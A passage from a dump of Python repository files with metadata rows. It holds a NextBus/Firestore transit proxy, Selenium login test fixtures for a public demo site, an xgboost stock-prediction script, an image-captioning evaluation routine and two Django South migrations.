        req.add_header('Content-Type', 'application/json')
        urllib2.urlopen(req, body)

    def get(self):
        now = int(time.time())
        url = 'http://webservices.nextbus.com/service/publicJSONFeed?command=vehicleLocations&a=sf-muni'
        result = urllib2.urlopen(url)
        data = json.loads(result.read())
        # Keep only rail routes (and their bus substitutions).
        trains = filter(lambda x: x['routeTag'] in ['J', 'KJ', 'KT', 'L', 'LK', 'M', 'N', 'S', 'T', 'TM', 'JBUS', 'KBUS', 'LBUS', 'MBUS', 'NBUS', 'SBUS', 'TBUS'], data['vehicle'])
        body = json.dumps({
            'fields': {
                'd': { 'integerValue': now },
                't': {
                    'mapValue': {
                        'fields': {v['id']: formatValue(v) for v in trains}
                    }
                }
            }
        }, separators=(',', ':'))
        for project in self._PROJECTS:
            self._store(project, now, body)
        self.response.headers['content-type'] = 'application/json'
        self.response.write(body)
class THandler(webapp2.RequestHandler):
    """Read-through proxy for the Firestore 't' (train snapshots) collection.

    Forwards the incoming query string to the Firestore REST list endpoint,
    flattens every returned document into plain Python values, and serves the
    result as cacheable CORS-enabled JSON.
    """
    def get(self):
        # Query string is passed through verbatim to the Firestore list API.
        url = 'https://firestore.googleapis.com/v1beta1/projects/go-dashboard-2ff4e/databases/(default)/documents/t?%s' % self.request.query_string
        result = urllib2.urlopen(url)
        data = json.loads(result.read())
        data['documents'] = map(flattenDocument, data['documents'])
        # Cache until one minute after the first document's 'd' timestamp.
        # NOTE(review): assumes documents[0] is the relevant/newest snapshot;
        # confirm the ordering guarantees of the query being proxied.
        expires = data['documents'][0]['d'] + 60
        self.response.headers['access-control-allow-origin'] = 'https://keanulee.github.io'
        self.response.headers['cache-control'] = 'public'
        self.response.headers['expires'] = format_date_time(expires)
        self.response.headers['content-type'] = 'application/json'
        self.response.write(json.dumps(data, separators=(',', ':')))
# URL routing for the webapp2 WSGI application.
app = webapp2.WSGIApplication([
    ('/fetch', FetchHandler),
    ('/t', THandler),
    ], debug=True)
| [
"keanulee517@gmail.com"
] | keanulee517@gmail.com |
6256e8c471c987e197b563d2790a1f2a8a49dfc5 | 46357db3b1c1af699384d9cba1ffbc3c732117ad | /selenium_advanced/herokuapp/TestData/TestData.py | 1d4b10cd2c77950959e52ecbbc1231a49994dfcd | [] | permissive | khanhdodang/automation-training-python | 28fbd70ca4bc84e47cf17d1e4702513863e38c44 | b16143961cee869c7555b449e2a05abeae2dc3b5 | refs/heads/master | 2023-07-11T05:21:34.495851 | 2021-08-18T01:29:37 | 2021-08-18T01:29:37 | 285,208,030 | 0 | 8 | MIT | 2020-09-29T07:01:15 | 2020-08-05T07:01:46 | Python | UTF-8 | Python | false | false | 223 | py | class TestData():
    # Static fixtures for the the-internet.herokuapp.com login tests.
    BASE_URL = "https://the-internet.herokuapp.com/login"  # page under test
    USERNAME = "tomsmith"  # username for the positive-path login
    FAKE_USERNAME = "khanhdo"  # presumably used for negative login tests -- confirm usage
    PASSWORD = "SuperSecretPassword!"
    FAKE_PASSWORD = "SuperSecretPassword"  # PASSWORD minus the trailing '!'
    BROWSER = "chrome"  # browser name for the test runner
"khanhdo.pmp@gmail.com"
] | khanhdo.pmp@gmail.com |
3500c022e88b6b91854a99d93f348129c9df11ba | c577c2383dad59ad33c78d2ba4262c5cc2d46a89 | /src/pred_boosting.py | 1efd7e4110d584f5ee68d26b261be4e53833388f | [] | no_license | swethmandava/stock_prediction | aa070c43aced52c9e70c38d2bfa29a25e401efa5 | 1d966b75869545a774a15bfdfb43cb02a85cd96b | refs/heads/master | 2021-08-23T22:52:34.328710 | 2017-12-06T23:57:25 | 2017-12-06T23:57:25 | 111,018,816 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 4,507 | py | import xgboost as xgb
import numpy as np
import pandas as pd
from sklearn.model_selection import train_test_split
from parse import *
import matplotlib.pyplot as plt
import sys
#Skeleton code for xgboost.
def train(dtrain, dvalid, evallist, params, epochs, early_stopping_iterations):
    """Fit a booster on ``dtrain`` with early stopping monitored on ``evallist``.

    Returns ``(booster, mse)`` where ``mse`` is the mean squared error of the
    booster's predictions on ``dvalid``.

    Fixes over the original:
      * the ground truth was read from the module-level global ``valid_y``,
        which silently coupled this function to the ``__main__`` block; the
        labels are now taken from ``dvalid`` itself (``DMatrix.get_label``).
      * the mean squared error was computed twice; it is computed once.
    """
    bst = xgb.train(
        params, dtrain, epochs, evallist,
        early_stopping_rounds=early_stopping_iterations, verbose_eval=False)
    pred = bst.predict(dvalid)
    residual = pred - dvalid.get_label()
    avg_error = np.mean(residual * residual)
    return bst, avg_error
#Perform cross validation for best set of parameters
def cross_validate_train(train_x, valid_x, train_y, valid_y):
dtrain = xgb.DMatrix(train_x, label=train_y)
dvalid = xgb.DMatrix(valid_x, label=valid_y)
params = {}
learning_rates = [0.001, 0.01, 0.05, 0.1]
gammas = [0.001, 0.01, 0.1] #Loss to split further
max_depths = [1, 2, 5, 10] #Maximum depth of tree
subsamples = [0.5, 0.75, 1.0] #percentage of batch to use in each epoch
lambdas = [0, 0.001, 0.01, 0.1, 1, 10] #L2 regularization
alphas = [0, 0.001, 0.01, 0.1, 1, 10] #L1 regularization
params['silent'] = 1
epochs = 10000
early_stopping_iterations = 10
evallist = [(dvalid, 'eval'), (dtrain, 'train')]
best_error = np.inf
best_model = None
best_params = dict(params)
for learning_rate in learning_rates:
for gamma in gammas:
for max_depth in max_depths:
for subsample in subsamples:
for lambda_i in lambdas:
for alpha in alphas:
params['eta'] = learning_rate
params['gamma'] = gamma
params['max_depth'] = max_depth
params['subsample'] = subsample
params['lambda'] = lambda_i
params['alpha'] = alpha
bst, avg_error = train(dtrain, dvalid, evallist,
params, epochs, early_stopping_iterations)
print "Parameters are: ", params
print "Average error is: ", avg_error, "\n"
if avg_error < best_error:
best_params = params
best_error = avg_error
best_model = bst
best_model.save_model('../stock_data/boosting_results/model_0.model')
# xgb.plot_importance(best_model) #plots histogram showing importance of features
# plt.show()
# xgb.plot_tree(bst, num_trees=5) #plots 2 trees
#There are a ton more parameters we could experiment with here
# xgboost.readthedocs.io/en/latest/parameter.html
return bst, best_params
def incremental_train(x, y, valid_x, valid_y, model, params, model_name):
    """Run one extra boosting round on new data, warm-starting from ``model_name``.

    ``valid_x``, ``valid_y`` and ``model`` are kept for signature compatibility
    with the streaming loop but are not needed here: the booster is reloaded
    from the ``model_name`` checkpoint and trained for a single round on
    ``(x, y)``.

    Fix: the original also built ``dvalid`` and ``evallist`` locals that were
    never passed to ``xgb.train``; that dead code is removed.
    """
    dupdate = xgb.DMatrix(x, label=y)
    return xgb.train(params, dupdate, 1, xgb_model=model_name)
if __name__ == '__main__':
    # Streaming evaluation: predict one day at a time, then fine-tune the
    # booster on the newly revealed day before moving on.
    filename = 'stock_data/Stocks/aple.us.txt'
    data_x, data_y, stream, _ = get_data(filename, initial_size=300)
    valid_split_ratio = 0.1
    #Splits in a chronological manner
    [num_samples, num_features] = data_x.shape
    index_split = int((1-valid_split_ratio) * num_samples)
    train_x = data_x[:index_split, :]
    train_y = data_y[:index_split]
    valid_x = data_x[index_split:, :]
    valid_y = data_y[index_split:]
    #Trains Prior Model
    # model, params = cross_validate_train(train_x, valid_x, train_y, valid_y)
    # Hyper-parameters below were presumably selected by an earlier
    # cross_validate_train run (see commented call above) -- confirm.
    params = {'silent': 1, 'subsample': 1.0, 'eta': 0.1, 'alpha': 10, 'max_depth': 10, 'gamma': 0.1, 'lambda': 10}
    model = xgb.Booster({'nthread':4})
    model.load_model("../stock_data/boosting_results/model_0.model")
    # NOTE(review): this None-check is dead code -- Booster() never returns
    # None and load_model raises on failure rather than returning None.
    if model is None:
        print "Model incorrect"
        sys.exit()
    time_series_y = []
    time_series_pred_y = []
    #Streaming Data:
    print params
    params["eta"] = 2 * params["eta"] #Give more weightage to new data
    day = 0
    model_name = '../stock_data/boosting_results/model_'+str(day)+".model"
    try:
        # Each iteration: pop the oldest validation row (the "current" day),
        # predict it, slide the newly streamed row into the validation window
        # (np.roll + overwrite of the last row), and fine-tune one round.
        while True:
            new_x,new_y = stream.next()
            x = valid_x[[0], :]
            y = valid_y[[0]]
            valid_x = np.roll(valid_x, -1, axis=0)
            valid_y = np.roll(valid_y, -1, axis=0)
            valid_x[-1, :] = new_x
            valid_y[-1] = new_y
            dtest = xgb.DMatrix(x)
            y_pred = model.predict(dtest)
            time_series_y.append(y)
            time_series_pred_y.append(y_pred)
            model = incremental_train(x, y, valid_x, valid_y, model, params, model_name)
            day = day + 1
            model_name = '../stock_data/boosting_results/model_'+str(day)+".model"
            model.save_model(model_name)
            # NOTE(review): prev_x/prev_y are never read afterwards.
            prev_x = x
            prev_y = y
    except StopIteration:
        # Stream exhausted: persist the per-day truth/prediction series.
        pass
    np.save("../stock_data/boosting_results/time_series_y", time_series_y)
np.save('../stock_data/boosting_results/time_series_pred_y', time_series_pred_y) | [
"sweth.mandava@gmail.com"
] | sweth.mandava@gmail.com |
0402c5f7fc9d223a57e42857d3c22beb1db6578e | fd72c01cb6b3d32995d8e82151d230f805022b9f | /misc/eval_utils.py | 9f064f6827c67dc3930f7380ea1b5cd0c037f793 | [
"MIT"
] | permissive | zokooo/Sub-GC | 1093a51bb19a30283803d0e72fe4264e34a18b37 | b99ede5163be8378d56b834a66b702b23a76e4e2 | refs/heads/master | 2023-05-25T10:43:29.245025 | 2021-06-16T17:36:52 | 2021-06-16T17:36:52 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,752 | py | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import torch
import torch.nn as nn
import torch.nn.functional as F
import numpy as np
import json
import random
import time
import os
import sys
import misc.utils as utils
import math
from collections import defaultdict
from misc.sentence_utils import *
from misc.grd_utils import *
random_seed = 2019
np.random.seed(random_seed)
random.seed(random_seed)
def eval_split(model, crit, loader, eval_kwargs=None, opt=None, val_model=None):
    '''
    This function contains 2 branches:
    1. model inference (model is not None): validation (returns the mean
       validation loss) or testing (generates captions per sub-graph and
       saves them to disk, optionally collecting grounding material).
    2. evaluation only (model is None): reload previously saved captions,
       align them to `oracle_num` sentences per image, and run language_eval.

    Fix over the original: `eval_kwargs` defaulted to a mutable `{}` shared
    across calls; it now defaults to None and is normalized to a fresh dict.
    '''
    if eval_kwargs is None:
        eval_kwargs = {}
    verbose = eval_kwargs.get('verbose', True)
    verbose_beam = eval_kwargs.get('verbose_beam', 1)
    verbose_loss = eval_kwargs.get('verbose_loss', 1)
    num_images = eval_kwargs.get('num_images', eval_kwargs.get('val_images_use', -1))
    split = eval_kwargs.get('split', 'val')
    lang_eval = eval_kwargs.get('language_eval', 0)
    dataset = eval_kwargs.get('dataset', 'coco')
    beam_size = eval_kwargs.get('beam_size', 1)
    remove_bad_endings = eval_kwargs.get('remove_bad_endings', 0)
    os.environ["REMOVE_BAD_ENDINGS"] = str(remove_bad_endings) # a global configuration

    # grounding experiments
    return_att_weight = True if eval_kwargs.get('return_att', 0) == 1 else False
    if return_att_weight:
        assert beam_size == 1, "GVD repo only supports grounding evaluation with beam size as 1"
        gvd_all_dict = np.load('data/gvd_all_dict.npy', allow_pickle=True,encoding='latin1').tolist()
        ind_to_wd = gvd_all_dict['ind_to_wd']
        wd_to_lemma = gvd_all_dict['wd_to_lemma']
        lemma_det_id_dict = gvd_all_dict['lemma_det_id_dict']
        det_id_to_det_wd = gvd_all_dict['det_id_to_det_wd']
        grd_output = defaultdict(list)
        model_path = eval_kwargs['infos_path'].split('/')
        consensus_rerank_file = model_path[0] + '/' + model_path[1] + '/consensus_rerank_ind.npy'
        grd_sGPN_consensus = True if os.path.isfile(consensus_rerank_file) else False

    # controllability experiments
    sct_mode = True if eval_kwargs.get('sct', 0) == 1 else False

    n = 0
    loss = 0
    loss_sum = 0
    loss_evals = 1e-8
    predictions = []

    # 1. run model in inference mode
    if model is not None:
        model.eval()
        loader.reset_iterator(split)
        while True:
            data = loader.get_batch(split)
            n = n + loader.batch_size
            if data.get('labels', None) is not None and verbose_loss: # model validation
                tmp = [data['fc_feats'], data['att_feats'], data['labels'], data['masks'], data['att_masks'], data['trip_pred'],\
                    data['obj_dist'], data['obj_box'], data['rel_ind'], data['pred_fmap'], data['pred_dist'],\
                    data['gpn_obj_ind'], data['gpn_pred_ind'], data['gpn_nrel_ind'],data['gpn_pool_mtx']]
                tmp = [_.cuda() if _ is not None else _ for _ in tmp]
                fc_feats, att_feats, labels, masks, att_masks, trip_pred, obj_dist, obj_box, rel_ind, pred_fmap, pred_dist,\
                gpn_obj_ind, gpn_pred_ind, gpn_nrel_ind, gpn_pool_mtx = tmp
                with torch.no_grad():
                    lang_output, _, _ = model(fc_feats, att_feats, labels, att_masks, trip_pred,\
                        obj_dist, obj_box, rel_ind, pred_fmap, pred_dist, gpn_obj_ind, gpn_pred_ind, gpn_nrel_ind, gpn_pool_mtx)
                    loss = crit(lang_output, labels[:,1:], masks[:,1:]).item()
                loss_sum += loss # only use validation loss
                loss_evals += 1
            else: # model testing
                tmp = [data['fc_feats'], data['att_feats'], data['labels'], data['masks'], data['att_masks'], data['trip_pred'],\
                    data['obj_dist'], data['obj_box'], data['rel_ind'], data['pred_fmap'], data['pred_dist'],\
                    data['gpn_obj_ind'], data['gpn_pred_ind'], data['gpn_nrel_ind'], data['gpn_pool_mtx']]
                tmp = [_.cuda() if _ is not None else _ for _ in tmp]
                fc_feats, att_feats, labels, masks, att_masks, trip_pred, obj_dist, obj_box, rel_ind, pred_fmap, pred_dist,\
                gpn_obj_ind, gpn_pred_ind, gpn_nrel_ind, gpn_pool_mtx = tmp
                # send all subgraphs of a image to generate sentences
                with torch.no_grad():
                    if return_att_weight: # grounding experiments
                        seqq, seqLogprobs, subgraph_score, keep_nms_ind, att_weights = model(fc_feats, att_feats, att_masks, trip_pred,\
                            obj_dist, obj_box, rel_ind, pred_fmap, pred_dist, gpn_obj_ind, gpn_pred_ind, gpn_nrel_ind, gpn_pool_mtx,\
                            opt=eval_kwargs, mode='sample')
                    else:
                        seqq, seqLogprobs, subgraph_score, keep_nms_ind = model(fc_feats, att_feats, att_masks, trip_pred,\
                            obj_dist, obj_box, rel_ind, pred_fmap, pred_dist, gpn_obj_ind, gpn_pred_ind, gpn_nrel_ind, gpn_pool_mtx,\
                            opt=eval_kwargs, mode='sample')
                if not sct_mode:
                    if model.gpn: # sub-graph captioning model
                        sorted_score, sort_ind = torch.sort(subgraph_score,descending=True)
                        seq = seqq[sort_ind].data
                        subgraph_score = sorted_score.data
                        sorted_subgraph_ind = keep_nms_ind[sort_ind] # the indices are to index sub-graph in original order
                    else: # model that use full graph
                        sort_ind = torch.arange(subgraph_score.size(0)).type_as(keep_nms_ind)
                        seq = seqq.data
                        sorted_subgraph_ind = keep_nms_ind.data
                else: # for show control and tell, order should be same as inputs and thus no sorting
                    valid_num = int(subgraph_score.size(0) / 2)
                    seq = seqq.data[:valid_num]
                    subgraph_score = subgraph_score.data[:valid_num]
                    sorted_subgraph_ind = keep_nms_ind[:valid_num]
                    sort_ind = keep_nms_ind[:valid_num].long()
                print('\nNo {}:'.format(n))
                if beam_size > 1 and verbose_beam:
                    keep_ind = sort_ind.cpu().numpy()
                    print('beam seach sentences of image {}:'.format(data['infos'][0]['id']))
                    for i in np.random.choice(keep_ind, size=1, replace=True):
                        print('subgraph {}'.format(i))
                        print('\n'.join([utils.decode_sequence(loader.get_vocab(), _['seq'].unsqueeze(0))[0] for _ in model.done_beams[i]]))
                        print('--' * 10)
                sents = utils.decode_sequence(loader.get_vocab(), seq) # use the first beam which has highest cumulative score
                # save best sentence generated by all subgraphs of a image
                entry = {'image_id': data['infos'][0]['id'], 'caption': []}
                entry['subgraph_score'] = subgraph_score.cpu().numpy()
                entry['sorted_subgraph_ind'] = sorted_subgraph_ind.cpu().numpy()
                for k, sent in enumerate(sents):
                    entry['caption'].append(sent)
                predictions.append(entry)
                if verbose:
                    best_ind = torch.argmax(subgraph_score).item()
                    print('keeping {} subgraphs'.format(len(sents)))
                    print('best subgraph score sentence: \n{}'.format(entry['caption'][best_ind]))
                    print('--' * 20)
                # collect grounding material for grounding evaluation
                if return_att_weight:
                    get_grounding_material(eval_kwargs['infos_path'], data, sents, sorted_subgraph_ind, att_weights, sort_ind, \
                        wd_to_lemma, lemma_det_id_dict, det_id_to_det_wd, grd_output, \
                        use_full_graph=not model.gpn, grd_sGPN_consensus=grd_sGPN_consensus)
            if data['bounds']['wrapped']:
                break
            if num_images >= 0 and n >= num_images:
                break
        # save prediction results
        if data.get('labels', None) is not None and verbose_loss: # after model validation, switch back to training mode
            model.train()
            return loss_sum/loss_evals
        else: # after model testing, save generated results
            save_path = eval_kwargs['infos_path'].split('/')
            if not sct_mode: # sub-graph captioning
                np.save(save_path[0] + '/' + save_path[1] + '/' + 'captions_{}.npy'.format(save_path[-1].split('-')[1].split('.')[0]),predictions)
            else: # sct mode, controllability experiments
                np.save(save_path[0] + '/' + save_path[1] + '/' + 'ctl_captions_{}.npy'.format(save_path[-1].split('-')[1].split('.')[0]),predictions)
            if return_att_weight: # grounding experiments
                with open(save_path[0] + '/' + save_path[1] + '/' + 'grounding_file.json', 'w') as f:
                    json.dump({'results':grd_output, 'eval_mode':'gen', 'external_data':{'used':True, 'details':'grounding experiment'}}, f)

    # 2. only evaluate the generated sentences
    if model is None:
        oracle_num = eval_kwargs.get('oracle_num', 1)
        sent_cnt = []
        align_pred = []
        save_path = eval_kwargs['infos_path'].split('/')
        predictions = np.load(save_path[0] + '/' + save_path[1] + '/' + 'captions_{}.npy'.format(\
            save_path[-1].split('-')[1].split('.')[0]), allow_pickle=True,encoding='latin1').tolist()
        for p_i in range(len(predictions)):
            sent_cnt.append(len(predictions[p_i]['caption']))
            entry = {'image_id': predictions[p_i]['image_id'], 'caption': predictions[p_i]['caption'][:oracle_num]}
            if len(entry['caption']) < oracle_num: # if subgraphs aren't engough
                for p_j in range(oracle_num)[len(entry['caption']):]:
                    entry['caption'].append(predictions[p_i]['caption'][0]) # pad with first sentence
                assert len(entry['caption']) == oracle_num
            align_pred.append(entry)
        if lang_eval == 1:
            language_eval(dataset, align_pred, eval_kwargs['id'], split, save_path, \
                is_flickr='coco' not in eval_kwargs['input_label_h5'])
"yzhong52@wisc.edu"
] | yzhong52@wisc.edu |
f0c03d3a5c771a559f64c228a83b0cd4f9ad034e | 40b4be3cb16cf88e50a090270ab454bfa6c45867 | /caminus/minecraft/migrations/0005_auto__add_playersession.py | 40540598421c33c546f3eff44b4f44ec39871b78 | [] | no_license | caminus/caminus | b497f0030dfb2a20b552df8bfb441eaa0fa5f0ae | 84c269ebb9ce61552a6bcb512c4d251ad4161b58 | refs/heads/master | 2021-01-04T02:37:24.524819 | 2015-02-10T06:23:06 | 2015-02-10T06:23:06 | 3,491,381 | 0 | 0 | null | 2017-07-21T00:05:25 | 2012-02-20T06:40:06 | Python | UTF-8 | Python | false | false | 6,249 | py | # encoding: utf-8
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
    """South schema migration: introduces the 'minecraft_playersession' table.

    Auto-generated by South. The `models` attribute below is South's frozen
    ORM snapshot at the time this migration was created; it must stay exactly
    as generated -- do not edit it by hand.
    """
    def forwards(self, orm):
        """Apply the migration: create the PlayerSession table and signal it."""
        # Adding model 'PlayerSession'
        db.create_table('minecraft_playersession', (
            ('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
            ('server', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['minecraft.Server'])),
            ('player', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['minecraft.MinecraftProfile'])),
            ('ip', self.gf('django.db.models.fields.IPAddressField')(max_length=15)),
            ('start', self.gf('django.db.models.fields.DateTimeField')(auto_now_add=True, blank=True)),
            ('end', self.gf('django.db.models.fields.DateTimeField')(null=True, blank=True)),
        ))
        db.send_create_signal('minecraft', ['PlayerSession'])
    def backwards(self, orm):
        """Revert the migration: drop the PlayerSession table."""
        # Deleting model 'PlayerSession'
        db.delete_table('minecraft_playersession')
    # Frozen ORM snapshot (auto-generated) used by South to reconstruct the
    # model state as of this migration.
    models = {
        'auth.group': {
            'Meta': {'object_name': 'Group'},
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
            'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
        },
        'auth.permission': {
            'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
            'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
        },
        'auth.user': {
            'Meta': {'object_name': 'User'},
            'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
            'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
            'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
            'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
            'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
            'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
            'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
            'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
            'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
        },
        'contenttypes.contenttype': {
            'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
            'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
        },
        'minecraft.minecraftprofile': {
            'Meta': {'object_name': 'MinecraftProfile'},
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'mc_username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'}),
            'user': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['auth.User']", 'unique': 'True'})
        },
        'minecraft.motd': {
            'Meta': {'object_name': 'MOTD'},
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'server': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['minecraft.Server']"}),
            'text': ('django.db.models.fields.TextField', [], {})
        },
        'minecraft.playersession': {
            'Meta': {'object_name': 'PlayerSession'},
            'end': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'ip': ('django.db.models.fields.IPAddressField', [], {'max_length': '15'}),
            'player': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['minecraft.MinecraftProfile']"}),
            'server': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['minecraft.Server']"}),
            'start': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'})
        },
        'minecraft.server': {
            'Meta': {'object_name': 'Server'},
            'hostname': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'port': ('django.db.models.fields.IntegerField', [], {'default': '25565'}),
            'query_port': ('django.db.models.fields.IntegerField', [], {'default': '25565'}),
            'ruleset': ('django.db.models.fields.TextField', [], {'default': "''"})
        }
    }
    complete_apps = ['minecraft']
| [
"tdfischer@fedoraproject.org"
] | tdfischer@fedoraproject.org |
1e247e40b554c06842ab2469383a40cab085ab2f | 1a8c0c2e93dfa67b48551a162093e4b727dfe8b2 | /courses/migrations/0020_auto__add_field_course_is_active.py | f4664d9ae9da0862279aaacce855ffaaee33c2f1 | [] | no_license | regisb/fun-apps | 7342d605dd61e167560c9505aad63ec00d0552b7 | f7db27c9a43b2f7fc4e1c522534f2549ab52fe0c | refs/heads/dev | 2021-05-24T02:21:55.876764 | 2015-12-08T14:00:42 | 2015-12-08T14:29:26 | 47,678,160 | 2 | 0 | null | 2015-12-09T08:21:47 | 2015-12-09T08:21:47 | null | UTF-8 | Python | false | false | 5,480 | py | # -*- coding: utf-8 -*-
from south.db import db
from south.v2 import SchemaMigration
class Migration(SchemaMigration):
    """South schema migration: adds the 'is_active' boolean to courses_course.

    Auto-generated by South. The `models` attribute below is South's frozen
    ORM snapshot at the time this migration was created; it must stay exactly
    as generated -- do not edit it by hand.
    """
    def forwards(self, orm):
        """Apply the migration: add Course.is_active (created rows get True)."""
        # Adding field 'Course.is_active'
        db.add_column('courses_course', 'is_active',
                      self.gf('django.db.models.fields.BooleanField')(default=True),
                      keep_default=False)
    def backwards(self, orm):
        """Revert the migration: drop Course.is_active."""
        # Deleting field 'Course.is_active'
        db.delete_column('courses_course', 'is_active')
    # Frozen ORM snapshot (auto-generated) used by South to reconstruct the
    # model state as of this migration.
    models = {
        'courses.course': {
            'Meta': {'ordering': "('-score',)", 'object_name': 'Course'},
            'end_date': ('django.db.models.fields.DateTimeField', [], {'db_index': 'True', 'null': 'True', 'blank': 'True'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'is_new': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'db_index': 'True'}),
            'key': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '200'}),
            'level': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '255', 'blank': 'True'}),
            'on_demand': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'db_index': 'True'}),
            'score': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0', 'db_index': 'True'}),
            'start_date': ('django.db.models.fields.DateTimeField', [], {'db_index': 'True', 'null': 'True', 'blank': 'True'}),
            'subjects': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'courses'", 'null': 'True', 'symmetrical': 'False', 'to': "orm['courses.CourseSubject']"}),
            'universities': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'courses'", 'symmetrical': 'False', 'through': "orm['courses.CourseUniversityRelation']", 'to': "orm['universities.University']"})
        },
        'courses.coursesubject': {
            'Meta': {'ordering': "('-score', 'name', 'id')", 'object_name': 'CourseSubject'},
            'description': ('ckeditor.fields.RichTextField', [], {'blank': 'True'}),
            'featured': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'db_index': 'True'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'image': ('django.db.models.fields.files.ImageField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '255', 'db_index': 'True'}),
            'score': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0', 'db_index': 'True'}),
            'short_name': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
            'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '255'})
        },
        'courses.courseuniversityrelation': {
            'Meta': {'ordering': "('order', 'id')", 'object_name': 'CourseUniversityRelation'},
            'course': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'related_universities'", 'to': "orm['courses.Course']"}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'order': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0', 'db_index': 'True'}),
            'university': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'related_courses'", 'to': "orm['universities.University']"})
        },
        'universities.university': {
            'Meta': {'ordering': "('-score', 'id')", 'object_name': 'University'},
            'banner': ('django.db.models.fields.files.ImageField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
            'certificate_logo': ('django.db.models.fields.files.ImageField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
            'code': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255'}),
            'description': ('ckeditor.fields.RichTextField', [], {'blank': 'True'}),
            'detail_page_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'db_index': 'True'}),
            'dm_api_key': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
            'dm_user_id': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'logo': ('django.db.models.fields.files.ImageField', [], {'max_length': '100'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '255', 'db_index': 'True'}),
            'parent': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'children'", 'null': 'True', 'to': "orm['universities.University']"}),
            'score': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0', 'db_index': 'True'}),
            'short_name': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
            'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '255', 'blank': 'True'})
        }
    }
    complete_apps = ['courses']
| [
"regis@behmo.com"
